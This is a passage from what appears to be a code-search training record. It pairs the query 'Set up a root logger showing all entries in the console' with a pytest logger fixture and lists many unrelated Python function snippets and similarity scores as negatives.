_resolveSingleStatement(arg)\n if not isinstance(arg, CNumber): return\n if arg.content != 0: return\n return base.pointerOf", "def get_func_by_frame(*args):\n return _ida_frame.get_func_by_frame(*args)", "def convert_arg((arg, attrs, mode, typ, name)):\n iorname = name\n return iorname, (arg, attrs, mode, typ, name)", "def get_pytype(self, c_arg, parse_arg):\n if isinstance(c_arg, FunctionAddress):\n return 'O'\n else:\n try:\n return pytype_parse_registry[(parse_arg.dtype, parse_arg.precision)]\n except KeyError as e:\n raise NotImplementedError(\"Type not implemented for argument collection : \"+str(type(parse_arg))) from e", "def get_arg(instruction, itype):\n\n if itype == itypes.family_code:\n return instruction[7:2]\n elif itype == itypes.opcode:\n return instruction[7:]\n elif itype == itypes.funct3:\n return instruction[15:12]\n elif itype == itypes.funct7:\n return instruction[32:25]\n elif itype == itypes.rs1:\n return instruction[20:15]\n elif itype == itypes.rs2:\n return instruction[25:20]\n elif itype == itypes.imm12lo:\n return concat(instruction[32], instruction[7], instruction[31:27])\n elif itype == itypes.imm12hi:\n return concat(instruction[27:25], instruction[12:8])\n elif itype == itypes.instruction_id:\n return instruction[15:12]\n elif itype == itypes.rd:\n return instruction[12:7]\n elif itype == itypes.imm12:\n return instruction[32:20]\n elif itype == itypes.imm12_sb:\n return concat(instruction[32:25], instruction[12:7])\n elif itype == itypes.imm20:\n return concat(instruction[31], instruction[20:12], instruction[20], instruction[31:21])\n elif itype == itypes.imm20_pc:\n return instruction[31:12]\n elif itype == itypes.shamtw:\n return instruction[25:20]\n elif itype == itypes.shamt:\n return instruction[25:20]\n else:\n return None", "def test_short_form_multi():\n from typing import Any, AnyStr\n\n def func(arg1, arg2):\n # type: (AnyStr, int) -> Any\n pass\n\n assert get_type_hints(func, globals(), locals()) == {\n 'return': Any,\n 'arg1': AnyStr,\n 'arg2': int\n }", "def test_vulkan_func_pointer_with_pointer_return_value() -> None:\n xml = \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <type category=\"funcpointer\">typedef void* (VKAPI_PTR *\n <name>PFN_vkReallocationFunction</name>)(\n <type>void</type>* pUserData,\n <type>void</type>* pOriginal,\n <type>size_t</type> size,\n <type>size_t</type> alignment,\n <type>VkSystemAllocationScope</type> allocationScope);</type>\n \"\"\"\n\n funcptr = funcptr_parser.parse(ET.fromstring(xml))\n\n assert isinstance(funcptr, internal_types.VulkanFunctionPtr)\n assert funcptr.return_type == \"void*\"", "def WrapFunction(lib, funcname, restype, argtypes):\n func = lib.__getattr__(funcname)\n func.restype = restype\n func.argtypes = argtypes\n return func", "def get_function_by_name(name):\n function_name = name + 'ed'\n return globals()[function_name]", "def find(name: str):\n return _functions[name]", "def cython_c2py_conv_function_pointer(t_, ts):\n t = t_[1]\n argnames = []\n argdecls = []\n argbodys = []\n argrtns = []\n for n, argt in t[1][2]:\n argnames.append(n)\n decl, body, rtn = ts.cython_py2c(n, argt, proxy_name=\"c_\" + n)\n argdecls += decl.split('\\n') if isinstance(decl,basestring) else [decl]\n argbodys += body.split('\\n') if isinstance(body,basestring) else [body]\n argrtns += rtn.split('\\n') if isinstance(rtn,basestring) else [rtn]\n rtnname = 'rtn'\n rtnprox = 'c_' + rtnname\n rtncall = 'c_call_' + rtnname\n while rtnname in argnames or rtnprox in argnames:\n rtnname += '_'\n rtnprox += '_'\n argdecls = indent(argdecls)\n argbodys = indent(argbodys)\n rtndecl, rtnbody, rtnrtn, _ = ts.cython_c2py(rtncall, t[2][2],\n cached=False, proxy_name=rtnprox, existing_name=rtncall)\n if rtndecl is None and rtnbody is None:\n rtnprox = rtnname\n rtndecls = [rtndecl]\n returns_void = (t[2][2] == 'void')\n if not returns_void:\n rtndecls.append(\"cdef {0} {1}\".format(ts.cython_ctype(t[2][2]),\n rtncall))\n rtndecl = indent(rtndecls)\n rtnbody = indent(rtnbody)\n s = ('def {{proxy_name}}({arglist}):\\n'\n '{argdecls}\\n'\n '{rtndecl}\\n'\n ' if {{var}} == NULL:\\n'\n ' raise RuntimeError(\"{{var}} is NULL and may not be '\n 'safely called!\")\\n'\n '{argbodys}\\n')\n s += ' {{var}}({carglist})\\n' if returns_void else \\\n ' {rtncall} = {{var}}({carglist})\\n'\n s += '{rtnbody}\\n'\n s = s.format(arglist=\", \".join(argnames), argdecls=argdecls,\n cvartypeptr=ts.cython_ctype(t_).format(type_name='cvartype'),\n argbodys=argbodys, rtndecl=rtndecl, rtnprox=rtnprox,\n rtncall=rtncall, carglist=\", \".join(argrtns), rtnbody=rtnbody)\n caches = 'if {cache_name} is None:\\n' + indent(s)\n if not returns_void:\n caches += \"\\n return {rtnrtn}\".format(rtnrtn=rtnrtn)\n caches += '\\n {cache_name} = {proxy_name}\\n'\n return s, s, caches", "def identify(func):\n def identified(arg):\n func(arg)\n return arg\n return identified", "def _get_first(details: CallableDetails) -> CallableArg:\n return details.args[0]", "def parse_function_signature(code):\n m = re.search(\"^\\s*\" + re_func_decl + \"\\s*{\", code, re.M)\n if m is None:\n print(code)\n raise Exception(\"Failed to parse function signature. \"\n \"Full code is printed above.\")\n rtype, name, args = m.groups()[:3]\n if args == 'void' or args.strip() == '':\n args = []\n else:\n args = [tuple(arg.strip().split(' ')) for arg in args.split(',')]\n return name, args, rtype", "def get_func(self, name_str):\n return self.func.get(name_str)", "def _name_to_func(self, cmd_name: str):\n if cmd_name not in SUPPORTED_COMMANDS:\n # redis remaps \\r or \\n in an error to ' ' to make it legal protocol\n clean_name = cmd_name.replace(\"\\r\", \" \").replace(\"\\n\", \" \")\n raise SimpleError(msgs.UNKNOWN_COMMAND_MSG.format(clean_name))\n sig = SUPPORTED_COMMANDS[cmd_name]\n func = getattr(self, sig.func_name, None)\n return func, sig", "def bind_funct(self, symbol, argtypes=[], restypes=None, used_name=None):\n if used_name is None:\n used_name = symbol\n funct = self.__get_symbol(symbol)\n #print(\"binding function {0}: {1}\".format(symbol, funct))\n self.__funct_config(funct, argtypes, restypes)\n self.__funct_add(used_name, funct)", "def map_type(name):\n\n rv = MAPPINGS.get(name, None)\n if rv is not None:\n return rv\n\n name = name.replace(\"&\", \"*\")\n\n if name.startswith(\"const \"):\n rv = map_type(name[6:])\n\n elif name.endswith(\"const\"):\n rv = map_type(name[:-5])\n\n elif name.endswith(\" *\"):\n mapped = map_type(name[:-2])\n rv = f\"POINTER({mapped})\"\n\n elif name.endswith(\" **\"):\n mapped = map_type(name[:-1])\n rv = f\"POINTER({mapped})\"\n\n elif name.endswith(\"]\"):\n m = re.match(r\"(.*) \\[(\\d+)\\]\", name)\n if m is None:\n raise Exception(f\"Couldn't map type {name}\")\n\n mapped = map_type(m.group(1))\n count = m.group(2)\n\n rv = f\"({mapped} * {count})\"\n\n elif \"(*)\" in name:\n return \"c_void_p\"\n\n else:\n raise Exception(f\"Couldn't map type {name!r}\")\n\n MAPPINGS[name] = rv\n return rv", "def get_func(op):\n if op == \"-e\":\n return func\n elif op == \"-d\":\n return unfunc", "def dummy_ptrtype(*args):\n return _ida_hexrays.dummy_ptrtype(*args)", "def type(name):", "def test_from_callable(self):\n def func(a: int = 0):\n return a\n fsig = FSignature.from_callable(func)\n assert len(fsig.parameters) == 1\n assert fsig.parameters['a'] == FParameter(\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n name='a',\n interface_name='a',\n default=0,\n type=int,\n )", "def _PyType_Lookup(space, type, w_name):\n w_type = from_ref(space, rffi.cast(PyObject, type))\n assert isinstance(w_type, W_TypeObject)\n\n if not space.isinstance_w(w_name, space.w_text):\n return None\n name = space.text_w(w_name)\n w_obj = w_type.lookup(name)\n # this assumes that w_obj is not dynamically created, but will stay alive\n # until w_type is modified or dies. Assuming this, we return a borrowed ref\n return w_obj", "def __call__(self, details: CallableDetails) -> CallableArg:\n if not details.args:\n raise IncompatibleHandlerFactoryError(\n f\"Callable {details.obj!r} has no explicit argument\"\n )\n arg = self._find(details)\n self._check_type(details, arg)\n return arg", "def getcallargs(func, *positional, **named):\r\n args, varargs, varkw, defaults = getargspec(func)\r\n f_name = func.__name__\r\n arg2value = {}\r\n\r\n # The following closures are basically because of tuple parameter unpacking.\r\n assigned_tuple_params = []\r\n def assign(arg, value):\r\n if isinstance(arg, str):\r\n arg2value[arg] = value\r\n else:\r\n assigned_tuple_params.append(arg)\r\n value = iter(value)\r\n for i, subarg in enumerate(arg):\r\n try:\r\n subvalue = next(value)\r\n except StopIteration:\r\n raise ValueError('need more than %d %s to unpack' %\r\n (i, 'values' if i > 1 else 'value'))\r\n assign(subarg,subvalue)\r\n try:\r\n next(value)\r\n except StopIteration:\r\n pass\r\n else:\r\n raise ValueError('too many values to unpack')\r\n def is_assigned(arg):\r\n if isinstance(arg,str):\r\n return arg in arg2value\r\n return arg in assigned_tuple_params\r\n if ismethod(func) and func.im_self is not None:\r\n # implicit 'self' (or 'cls' for classmethods) argument\r\n positional = (func.im_self,) + positional\r\n num_pos = len(positional)\r\n num_total = num_pos + len(named)\r\n num_args = len(args)\r\n num_defaults = len(defaults) if defaults else 0\r\n for arg, value in zip(args, positional):\r\n assign(arg, value)\r\n if varargs:\r\n if num_pos > num_args:\r\n assign(varargs, positional[-(num_pos-num_args):])\r\n else:\r\n assign(varargs, ())\r\n elif 0 < num_args < num_pos:\r\n raise TypeError('%s() takes %s %d %s (%d given)' % (\r\n f_name, 'at most' if defaults else 'exactly', num_args,\r\n 'arguments' if num_args > 1 else 'argument', num_total))\r\n elif num_args == 0 and num_total:\r\n raise TypeError('%s() takes no arguments (%d given)' %\r\n (f_name, num_total))\r\n for arg in args:\r\n if isinstance(arg, str) and arg in named:\r\n if is_assigned(arg):\r\n raise TypeError(\"%s() got multiple values for keyword \"\r\n \"argument '%s'\" % (f_name, arg))\r\n else:\r\n assign(arg, named.pop(arg))\r\n if defaults: # fill in any missing values with the defaults\r\n for arg, value in zip(args[-num_defaults:], defaults):\r\n if not is_assigned(arg):\r\n assign(arg, value)\r\n if varkw:\r\n assign(varkw, named)\r\n elif named:\r\n unexpected = next(iter(named))\r\n if isinstance(unexpected, unicode):\r\n unexpected = unexpected.encode(sys.getdefaultencoding(), 'replace')\r\n raise TypeError(\"%s() got an unexpected keyword argument '%s'\" %\r\n (f_name, unexpected))\r\n unassigned = num_args - len([arg for arg in args if is_assigned(arg)])\r\n if unassigned:\r\n num_required = num_args - num_defaults\r\n raise TypeError('%s() takes %s %d %s (%d given)' % (\r\n f_name, 'at least' if defaults else 'exactly', num_required,\r\n 'arguments' if num_required > 1 else 'argument', num_total))\r\n return arg2value", "def find_called_function(self, name, node):\n\n functions = self.context.get_functions(name)\n\n if len(functions) == 1:\n return functions[0]\n else:\n matching_functions = []\n\n for function in functions:\n if self.visit_call_params(function, node):\n matching_functions.append(function)\n\n if len(matching_functions) != 1:\n raise CompileError('ambigious function call', node)\n\n return matching_functions[0]", "def extractFunction(func, name = None):\n if name == None and repr(type(func)) == \"<type 'instancemethod'>\":\n new_func = mkfunction(func.func_code, func.func_globals)\n return new_func\n\n if not hasattr(func, 'func_code'):\n raise ValueError, '%s is not a function.' % func\n\n code_object = None\n for const in func.func_code.co_consts.__iter__():\n if hasattr(const, 'co_name') and const.co_name == name:\n code_object = const\n\n if code_object:\n new_func = mkfunction(code_object, func.func_globals)\n return new_func\n else:\n raise ValueError, '%s does not have %s.' % (func, name)", "def get_func_lookup():\n return {\n \"randomstr\": randomstr,\n \"random\": random,\n \"sha256\": sha256,\n \"ed25519\": ed25519_private_key,\n \"rsa\": rsa_private_key,\n \"rsapublic\": rsa_public_key,\n \"publickey\": public_key,\n \"reveal\": reveal,\n \"loweralphanum\": loweralphanum,\n \"basicauth\": basicauth,\n }", "def createFunction(self, entryPoint: ghidra.program.model.address.Address, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def signature(function):\n pass", "def _function_factory(name: str, _command_type: type) -> Callable:\n\n def _new_func(**kwargs) -> None:\n \"\"\"Actual execution starter.\n\n We need so many wrappers because all those decorators\n could not be applied in a simple cycle. Last applied\n instance will just overwrite all.\n \"\"\"\n command = _command_type(**kwargs)\n run(command)\n\n _new_func.__name__ = name\n return _new_func", "def get_fsignature(builtin_name: Text) -> SignatureFn:\n signature = _PARAMETRIC_NAME_TO_SIGNATURE[builtin_name]\n f = _FSIGNATURE_REGISTRY[signature]\n\n # Since most of the functions don't need to provide symbolic bindings we make\n # a little wrapper that provides trivially empty ones to alleviate the typing\n # burden.\n def wrapper(\n arg_types: ArgTypes, name: Text, span: Span, ctx: DeduceCtx,\n parametric_bindings: Optional[ParametricBindings]\n ) -> Tuple[ConcreteType, SymbolicBindings]:\n result = f(arg_types, name, span, ctx, parametric_bindings)\n if isinstance(result, tuple):\n return result\n assert isinstance(result, ConcreteType), result\n return result, SymbolicBindings()\n\n return wrapper", "def get_function(callable_):\n if isinstance(callable_, types.MethodType):\n return callable_.__func__\n return callable_", "def type_cast(func,data_entry,*args):\n assert isinstance(data_entry,str)\n assert callable(func)\n try:\n out=func(data_entry,*args)\n except:\n out=None\n return out", "def selectorFor(callable, argIndex=-1):\n if argIndex == -1:\n for arg in callable.__metadata__()['arguments']:\n if arg['type'] == _C_SEL and 'sel_of_type' in arg:\n signature = arg['sel_of_type']\n break\n else:\n raise ValueError(\"No selector argument with type information\")\n\n else:\n try:\n signature = callable.__metadata__()['arguments'][argIndex]['sel_of_type']\n except (IndexError, KeyError):\n raise ValueError(\"Not a selector argument with type information\")\n\n def addSignature(function):\n return selector(function, signature=signature)\n\n return addSignature", "def getargspec(func):\n if isinstance(func, partial):\n return inspect.getargspec(func.func)\n else:\n if isinstance(func, type):\n return inspect.getargspec(func.__init__)\n else:\n return inspect.getargspec(func)", "def helper(func, options='args'):\n answer = inspect.getargspec(func)\n if options == 'args':\n print answer[0]\n elif options == 'default':\n print answer[-1]\n else:\n print func.__doc__", "def getargspec(self,obj):\n\n if inspect.isfunction(obj):\n func_obj = obj\n elif inspect.ismethod(obj):\n func_obj = obj.im_func\n else:\n raise TypeError, 'arg is not a Python function'\n args, varargs, varkw = inspect.getargs(func_obj.func_code)\n return args, varargs, varkw, func_obj.func_defaults", "def lookup(self, *args, **kwargs): # real signature unknown\n pass", "def lookup(self, *args, **kwargs): # real signature unknown\n pass", "def _getargspec(factory):\n import inspect\n if inspect.isclass(factory):\n factory = factory.__init__\n\n #logging.debug(\"Inspecting %r\", factory)\n args, vargs, vkw, defaults = inspect.getargspec(factory)\n if inspect.ismethod(factory):\n args = args[1:]\n return args, defaults", "def convert_result_as_arg(self, node, ordered_functions):\n return ordered_functions # XXX - do nothing for now\n options = node.options\n fmt_func = node.fmtdict\n# if options.F_string_len_trim is False: # XXX what about vector?\n# return\n\n ast = node.ast\n result_typemap = ast.typemap\n result_name = None\n\n # Check if result needs to be an argument.\n attrs = ast.attrs\n meta = ast.metaattrs\n if meta[\"deref\"] == \"raw\":\n # No bufferify required for raw pointer result.\n pass\n elif result_typemap.sgroup in [\"char\", \"string\"]:\n result_name = fmt_func.F_string_result_as_arg\n# result_as_arg = fmt_func.F_string_result_as_arg\n# result_name = result_as_arg or fmt_func.C_string_result_as_arg\n# elif result_typemap.base == \"vector\":\n# has_vector_result = True\n# elif result_is_ptr:\n# if meta[\"deref\"] in [\"allocatable\", \"pointer\"]:\n# need_cdesc_result = True\n# elif attrs[\"dimension\"]:\n# need_cdesc_result = True\n\n if not result_name:\n return\n\n##########\n # Create a new C function and change arguments\n # and add attributes.\n C_new = node.clone()\n ordered_functions.append(C_new)\n self.append_function_index(C_new)\n\n# generated_suffix = \"buf\"\n C_new._generated = \"result_to_arg\"\n fmt_func = C_new.fmtdict\n# fmt_func.function_suffix = fmt_func.function_suffix + fmt_func.C_bufferify_suffix + \"XXX\"\n# fmt_func.function_suffix = fmt_func.function_suffix\n\n options = C_new.options\n C_new.wrap.assign(c=True, fortran=True)\n C_new._PTR_C_CXX_index = node._function_index\n##########\n\n # decl: const char * getCharPtr2()\n new_arg = C_new.ast.result_as_arg(result_name)\n new_arg.const = False # must be writeable\n# attrs = new_arg.attrs\n# new_arg.metaattrs[\"deref\"] = None\n # Special case for wrapf.py to override \"allocatable\"\n\n # Special case for wrapf.py to override \"allocatable\"\n node.ast.metaattrs[\"deref\"] = None\n new_arg.metaattrs[\"deref\"] = \"result\"\n new_arg.metaattrs[\"is_result\"] = True\n C_new.ast.metaattrs[\"intent\"] = \"subroutine\"\n C_new.ast.metaattrs[\"deref\"] = None\n\n node.wrap.fortran = False\n# node.wrap.c = False\n\n return\n F_new = self.result_as_arg(node, C_new)\n ordered_functions.append(F_new)\n self.append_function_index(F_new)", "def test_short_form_single():\n def func(arg1):\n # type: (int) -> None\n pass\n\n assert get_type_hints(func) == {\n 'return': type(None),\n 'arg1': int\n }", "def _get_local_func_type(expr, context):\n\n # Sanity check.\n import expressions\n if (not isinstance(expr, expressions.Function_Call)):\n return None\n\n # Do we have the function definition?\n func_def = None\n try:\n func_def = context.get(expr.name)\n except KeyError:\n return None\n\n # Return the return type of the called function.\n if (hasattr(func_def, \"return_type\")):\n return func_def.return_type\n return None", "def derive_args(func):\n args = inspect.getfullargspec(func).args\n if args and is_selfish_name(args[0]):\n del args[0]\n return args", "def get_underlying_parameter(self, rel_name):\n return self._declaration[rel_name].underlying_parameter # pytype: disable=bad-return-type", "def get_func(self, class_name, arg, stored_objects):\n find_func = re.match('([a-z]+)', arg) # returns a matching object\n func_name = find_func.group()\n args = re.findall('\"([^\"]+)\",?', arg) # return a list of arguments\n\n if len(args) == 0:\n if func_name == \"all\":\n self.all(class_name, stored_objects)\n elif func_name == \"count\":\n self.count(class_name, stored_objects)\n else:\n print(\"** instance id missing **\")\n\n elif len(args) == 1:\n if self.check_instance(class_name, args[0], stored_objects):\n if func_name == \"show\":\n self.show(class_name, args[0], stored_objects)\n elif func_name == \"destroy\":\n self.destroy(class_name, args[0], stored_objects)\n elif func_name == \"update\":\n print(\"** attribute name missing **\")\n\n elif len(args) == 2 and func_name == \"update\":\n print(\"** value missing **\")\n\n elif len(args) == 3 and func_name == \"update\":\n if self.check_instance(class_name, args[0], stored_objects):\n self.update(class_name, args, stored_objects)", "def convert_type(self, name, type):\n\t\t#\t\tprint 'Called with name = %s and type = %s' %(name, type)\n\t\tname = ''.join(name.split())\n\t\ttype = ''.join(type.split())\n\n\t\tif re.match(r'\\w+', type): #It's a concrete type\n\t\t\treturn self.TYPES_DICT.get(type,type) + ' ' + name\n\n\t\tarrow = type.rfind('->')\n\t\tassert arrow != -1, \"If it's not a primitive, it must be a function\"\n\t\tparams, return_type = type[:arrow], type[arrow+2:]\n\t\tassert params[0] == '(' and params[-1] == ')'\n\t\tparams = params[1:-1]\n\n\t\tparams_tokenized = Lexer(params).get_tokens()\n\t\tparam_list = self.split_params(params_tokenized)\n\t\tcpp_params = map(lambda n: self.convert_type('', n), param_list)\n\t\treturn_type = self.convert_type('', return_type)\n\t\treturn return_type + '(*' + name + ')(' + ','.join(cpp_params) + ')'", "def get_func_by_name(self, name):\n if(name == self.name):\n res = self\n else:\n res = None\n return res", "def funcname(funcstr):\n ps = funcstr.find('(')\n return funcstr[:ps]", "def getFunctionAt(self, entryPoint: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Function:\n ...", "def test_vulkan_func_pointer_with_const_member() -> None:\n\n xml = \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <type category=\"funcpointer\">typedef VkBool32 (VKAPI_PTR *\n <name>PFN_vkDebugReportCallbackEXT</name>)(\n <type>VkDebugReportFlagsEXT</type> flags,\n <type>VkDebugReportObjectTypeEXT</type> objectType,\n <type>uint64_t</type> object,\n <type>size_t</type> location,\n <type>int32_t</type> messageCode,\n const <type>char</type>* pLayerPrefix,\n const <type>char</type>* pMessage,\n <type>void</type>* pUserData);</type>\n \"\"\"\n\n funcptr = funcptr_parser.parse(ET.fromstring(xml))\n\n argument_names = list(funcptr.arguments.keys())\n assert argument_names[4] == \"messageCode\"\n assert funcptr.arguments[\"pLayerPrefix\"].argument_type == \"const char*\"", "def find_func(self, params):\n match = self.funcs.get(params, self.funcs[(otherwise,)])\n return match", "def get_mapping_function(\n function_name: Text, functions_mapping: FunctionsMapping\n) -> Callable:\n if function_name in functions_mapping:\n return functions_mapping[function_name]\n\n elif function_name in [\"parameterize\", \"P\"]:\n return loader.load_csv_file\n\n elif function_name in [\"environ\", \"ENV\"]:\n return utils.get_os_environ\n\n elif function_name in [\"multipart_encoder\", \"multipart_content_type\"]:\n # extension for upload test\n from httprunner.ext import uploader\n\n return getattr(uploader, function_name)\n\n try:\n # check if HttpRunner builtin functions\n built_in_functions = loader.load_builtin_functions()\n return built_in_functions[function_name]\n except KeyError:\n pass\n\n try:\n # check if Python builtin functions\n return getattr(builtins, function_name)\n except AttributeError:\n pass\n\n raise exceptions.FunctionNotFound(f\"{function_name} is not found.\")", "def _get_function(func):\n if isinstance(func, method_types):\n func = func.__func__\n return func", "def function(receiver):\n if hasattr(receiver, IM_FUNC):\n # Instance method.\n im_func = getattr(receiver, IM_FUNC)\n func_code = getattr(im_func, FUNC_CODE)\n return receiver, func_code, True\n elif hasattr(receiver, FUNC_CODE):\n func_code = getattr(receiver, FUNC_CODE)\n return receiver, func_code, False\n elif hasattr(receiver, \"__call__\"):\n return function(receiver.__call__)\n else:\n raise ValueError(f\"unknown reciever type {receiver} {type(receiver)}\")", "def get_pointer(self, name, timeout=None):\r\n exist = self._exist(name)\r\n isobject = self._isobject(name, exist)\r\n\r\n if exist == 0:\r\n raise Oct2PyError('\"%s\" is undefined' % name)\r\n\r\n elif exist == 1:\r\n return _make_variable_ptr_instance(self, name)\r\n\r\n elif isobject:\r\n return self._get_user_class(name)\r\n\r\n elif exist in [2, 3, 5]:\r\n return self._get_function_ptr(name)\r\n\r\n raise Oct2PyError('Unknown type for object \"%s\"' % name)", "def find_functions(code):\n regex = \"^\\s*\" + re_func_decl + \"\\s*{\"\n \n funcs = []\n while True:\n m = re.search(regex, code, re.M)\n if m is None:\n return funcs\n \n rtype, name, args = m.groups()[:3]\n if args == 'void' or args.strip() == '':\n args = []\n else:\n args = [tuple(arg.strip().split(' ')) for arg in args.split(',')]\n funcs.append((name, args, rtype))\n \n code = code[m.end():]", "def is_calldef_pointer(type):\n if not is_pointer(type):\n return False\n nake_type = remove_alias(type)\n nake_type = remove_cv(nake_type)\n return isinstance(nake_type, cpptypes.compound_t) \\\n and isinstance(nake_type.base, cpptypes.calldef_type_t)", "def callBigDlFunc(bigdl_type, name, *args):\n gateway = _get_gateway()\n args = [_py2java(gateway, a) for a in args]\n error = Exception(\"Cannot find function: %s\" % name)\n for jinvoker in JavaCreator.instance(bigdl_type, gateway).value:\n # hasattr(jinvoker, name) always return true here,\n # so you need to invoke the method to check if it exist or not\n try:\n api = getattr(jinvoker, name)\n result = callJavaFunc(api, *args)\n except Exception as e:\n error = e\n # if the invoked method exist but something else went wrong, throw the exception\n if not re.match(r'.*Method.*does not exist', str(e), flags=re.DOTALL):\n invalidOperationError(False, str(e), cause=e)\n else:\n return result\n invalidOperationError(False, \"Cannot find function: %s\" % name, cause=error)", "def argument_type(arg):\n types = (int, float)\n \n for t in types:\n try:\n return type(t(arg))\n except ValueError:\n continue\n \n return str", "def getargspec(func):\r\n\r\n if ismethod(func):\r\n func = func.im_func\r\n if not isfunction(func):\r\n raise TypeError('{!r} is not a Python function'.format(func))\r\n args, varargs, varkw = getargs(func.func_code)\r\n return ArgSpec(args, varargs, varkw, func.func_defaults)", "def acfunct(arg):\n try:\n functions = [dynet.rectify, dynet.tanh]\n functions = { function.__name__ : function for function in functions}\n functions[\"None\"] = None\n return functions[str(arg)]\n except:\n raise argparse.ArgumentTypeError(\"String {} does not match required format\".format(arg,))", "def get_type(*args):\n return _ida_hexrays.get_type(*args)", "def extern(fn):\n return builtin(fn)", "def _lex_type_lookup_func(self, name):\n is_type = self._is_type_in_scope(name)", "def _load_from_callable(name, kwds, converters={}):\n # See if we actually have the named object.\n dotted_name = kwds.pop(name, None)\n if dotted_name is None:\n return None\n obj = resolveDotted(dotted_name)\n # Extract any arguments for the callable.\n obj_kwds = {}\n prefix = name + \"_\"\n for key in kwds.keys():\n if key.startswith(prefix):\n obj_kwds[key[len(prefix):]] = kwds.pop(key)\n # To any type conversion on the arguments.\n for key, value in obj_kwds.iteritems():\n converter = converters.get(key)\n if converter is not None:\n obj_kwds[key] = converter(value)\n # Call it if callable.\n if callable(obj):\n obj = obj(**obj_kwds)\n elif obj_kwds:\n raise ValueError(\"arguments provided for non-callable %r\" % (name,))\n return obj", "def get_function_name_at(self, address):\n pass", "def _get_type(func, name, doc, hints):\n doc_type = doc.params.get(name, _Param(None, None)).type\n if doc_type is not None:\n doc_type = _get_type_from_doc(doc_type, func.__globals__)\n\n try:\n hint = hints[name]\n except KeyError:\n hint_type = None\n else:\n hint_type = _get_type_from_hint(hint)\n\n chosen = [x is not None for x in [doc_type, hint_type]]\n if not any(chosen):\n raise ValueError('no type found for parameter {}'.format(name))\n if all(chosen) and doc_type != hint_type:\n raise ValueError('conflicting types found for parameter {}: {}, {}'\n .format(name, doc.params[name].type, hint.__name__))\n return doc_type or hint_type", "def load_function(library, function_name,\n module_type=MODULE_TYPE_EXECUTE_SIMPLE):\n function = getattr(library, function_name, None)\n if not function:\n function = getattr(library, function_name + \"_\", None)\n\n if function:\n if module_type == MODULE_TYPE_EXECUTE_SIMPLE:\n function.argtypes = [ctypes.c_voidp]\n function.restype = ctypes.c_int\n elif module_type == MODULE_TYPE_EXECUTE_CONFIG:\n function.argtypes = [ctypes.c_voidp, ctypes.c_voidp]\n function.restype = ctypes.c_int\n elif module_type == MODULE_TYPE_SETUP:\n function.argtypes = [ctypes.c_voidp]\n function.restype = ctypes.c_voidp\n elif module_type == MODULE_TYPE_CLEANUP:\n function.argtypes = [ctypes.c_voidp]\n function.restype = ctypes.c_int\n else:\n raise ValueError(\"Unknown module type passed to load_interface\")\n return function", "def extract_functions(elf_path):\n text_data = objdump_section(elf_path, '.text')\n name_to_addr = parse_func_names(text_data)\n return name_to_addr" ]
[ "0.66590554", "0.61740726", "0.61581415", "0.59001285", "0.5855032", "0.58468574", "0.5705164", "0.5677757", "0.5639868", "0.5615557", "0.5614763", "0.56135756", "0.5601841", "0.55988264", "0.5483516", "0.54684794", "0.5429972", "0.53992546", "0.53571665", "0.53392667", "0.53380996", "0.53260463", "0.53191066", "0.5304652", "0.5283336", "0.5265893", "0.5257242", "0.52564317", "0.5245141", "0.5237741", "0.52364755", "0.52337265", "0.523", "0.5222681", "0.5208236", "0.519406", "0.518955", "0.5184311", "0.5183014", "0.5174977", "0.5171404", "0.515855", "0.51580954", "0.51535106", "0.51291907", "0.5129172", "0.5089508", "0.50710523", "0.50697297", "0.5062785", "0.50577176", "0.5041915", "0.5037386", "0.5029763", "0.50216156", "0.50202227", "0.5019348", "0.50179297", "0.50141317", "0.50045395", "0.5004136", "0.49813733", "0.4968316", "0.49348086", "0.4930512", "0.49287096", "0.49286622", "0.49242422", "0.49242422", "0.49228743", "0.49187925", "0.48779663", "0.4875087", "0.48710608", "0.48666197", "0.48648745", "0.4860335", "0.48560968", "0.48549578", "0.48542655", "0.48370093", "0.48335794", "0.4830539", "0.48044807", "0.47957212", "0.4794228", "0.4790055", "0.47864643", "0.4774613", "0.47733328", "0.47707608", "0.47704327", "0.47689268", "0.4764447", "0.4762821", "0.4759284", "0.47576442", "0.47402817", "0.47399184", "0.47346908" ]
0.6079239
3
Set up a root logger showing all entries in the console.
def logger(request): log = logging.getLogger() hdlr = logging.StreamHandler() fmt = '%(asctime)s %(name)s %(levelname)s %(message)s' formatter = logging.Formatter(fmt) hdlr.setFormatter(formatter) log.addHandler(hdlr) log.setLevel(logging.DEBUG) log.propagate = False return log
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setup_logger():\n root = logging.getLogger()\n root.setLevel(LOGGING_LEVEL)\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(LOGGING_LEVEL)\n ch.setFormatter(formatter)\n root.addHandler(ch)", "def setup_logging():\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n console = logging.StreamHandler(sys.stdout)\n console.setLevel(logging.DEBUG)\n console.setFormatter(formatter)\n root = logging.getLogger()\n root.addHandler(console)\n root.setLevel(logging.DEBUG)", "def _setup_logger():\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n log_handle = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(\n \"[%(levelname)s] (%(asctime)s) - %(message)s\", datefmt=\"%Y-%m-%d %H:%M:%S\"\n )\n log_handle.setFormatter(formatter)\n root.addHandler(log_handle)\n\n logging.info(\"Initializing snakes\")", "def configure_logging(self):\n\n root_logger = logging.getLogger('')\n root_logger.setLevel(logging.DEBUG)\n\n console = logging.StreamHandler()\n console_level = self.LOG_LEVEL_MAP.get(self.options.verbose_level,\n logging.WARNING)\n console.setLevel(console_level)\n formatter = logging.Formatter(config.DEFAULT_MESSAGE_FORMAT)\n console.setFormatter(formatter)\n root_logger.addHandler(console)", "def initialize_logger(self):\n\n # initialize logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n # logger console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(logging.Formatter(\"\"))\n logger.addHandler(console_handler)", "def configure_logging(self):\r\n root_logger = logging.getLogger('')\r\n\r\n # Set up logging to a file\r\n root_logger.setLevel(logging.DEBUG)\r\n\r\n # Send higher-level messages to the console via stderr\r\n console = logging.StreamHandler(self.stderr)\r\n console_level = {self.WARNING_LEVEL: logging.WARNING,\r\n 